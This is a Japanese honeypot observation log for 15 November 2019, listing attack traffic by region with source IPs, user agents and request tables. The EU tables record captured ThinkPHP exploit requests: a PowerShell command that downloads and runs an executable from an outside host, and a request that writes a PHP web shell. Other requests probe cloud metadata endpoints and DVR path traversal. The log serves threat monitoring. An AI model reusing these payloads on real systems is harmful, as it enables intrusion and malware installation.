ハニーポット(仮) 観測記録 2019/11/15分です。
特徴
Region:AP
Shenzhen TVT製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Region:US
HiSilicon DVR Devicesの脆弱性を狙うアクセス
5[.]188[.]210[.]101に関する不正通信
を確認しました。
Region:EU
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuによるスキャン行為
123[.]125[.]114に関する不正通信
を確認しました。
ThinkPHPを狙うアクセスで以下のような動きを確認しました。
cmd.exe /c powershell (new-object System.Net.WebClient) .DownloadFile('http://fk.0xbdairolkoie.space/download.exe','%SystemRoot%/Temp/okucynwxnwjlghw28108.exe'); start %SystemRoot%/Temp/okucynwxnwjlghw28108.exe
他
アクセス数推移
AP:総アクセス数:43 (前日比:-15)
US:総アクセス数:5 (前日比:-20)
EU:総アクセス数:36 (前日比:+27)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 118.150.145.102 | Taiwan |
1 | 175.176.194.10 | China |
1 | 218.108.29.194 | China |
1 | 223.255.127.75 | China |
34 | 44.224.22.196 | United States |
4 | 80.82.77.139 | Netherlands |
1 | 89.248.169.17 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
23 | - |
1 | ApiTool |
14 | AWS Security Scanner |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
1 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko |
1 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | python-requests/2.13.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
1 | GET | /favicon.ico | HTTP/1.1 |
2 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
2 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http://example[.]com/ | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | /LoginPage.do | HTTP/1.1 |
1 | GET | /phpmyadmin | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | POST | /Login.htm | HTTP/1.0 |
10 | \x16\x03\x01 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 118.140.64.36 | Hong Kong |
1 | 14.177.154.212 | Vietnam |
1 | 45.33.5.240 | United States |
1 | 5.188.210.101 | Russia |
1 | 89.248.169.17 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | |||
1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
1 | GET | ../../mnt/custom/ProductDefinition | HTTP |
1 | GET | /webdav/ | HTTP/1.1 |
1 | POST | /Login.htm | HTTP/1.0 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 111.224.7.67 | China |
1 | 116.53.230.170 | China |
1 | 121.204.144.165 | China |
1 | 121.57.225.227 | China |
5 | 132.145.49.115 | United States |
1 | 175.43.16.203 | China |
1 | 178.27.185.94 | Germany |
1 | 180.95.231.141 | China |
1 | 185.128.41.50 | Switzerland |
1 | 223.166.74.184 | China |
1 | 223.166.74.24 | China |
8 | 39.135.1.194 | China |
1 | 45.20.22.246 | United States |
1 | 45.33.5.240 | United States |
6 | 58.210.85.22 | China |
1 | 59.9.16.131 | South Korea |
1 | 60.13.6.110 | China |
1 | 61.159.238.111 | China |
2 | 89.248.169.17 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
3 | - |
2 | ApiTool |
1 | Java/1.8.0_131 |
5 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
1 | Mozilla/5.01688858 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
4 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko |
8 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
3 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
6 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | |||
1 | CONNECT | cn[.]bing[.]com:443 | HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.1 |
1 | CONNECT | www[.]ip[.]cn:443 | HTTP/1.1 |
1 | GET | /elrekt[.]php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://www[.]123cha[.]com/ | HTTP/1.1 |
1 | GET | http://www[.]epochtimes[.]com/ | HTTP/1.1 |
1 | GET | http://www[.]rfa[.]org/english/ | HTTP/1.1 |
1 | GET | http://www[.]wujieliulan[.]com/ | HTTP/1.1 |
3 | GET | /index.php | HTTP/1.1 |
2 | GET | /manager/html | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fk.0xbdairolkoie.space/download.exe','%SystemRoot%/Temp/okucynwxnwjlghw28108.exe');start%20%SystemRoot%/Temp/okucynwxnwjlghw28108.exe | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fk.0xbdairolkoie.space/download.exe','%SystemRoot%/Temp/okucynwxnwjlghw28108.exe');start%20%SystemRoot%/Temp/okucynwxnwjlghw28108.exe | HTTP/1.1 |
1 | GET | /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /v1/agent/self | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | HEAD | http://123[.]125[.]114[.]144/ | HTTP/1.1 |
2 | POST | /editBlackAndWhiteList | HTTP/1.1 |
2 | POST | /Login.htm | HTTP/1.0 |
1 | \x16\x03\x01 |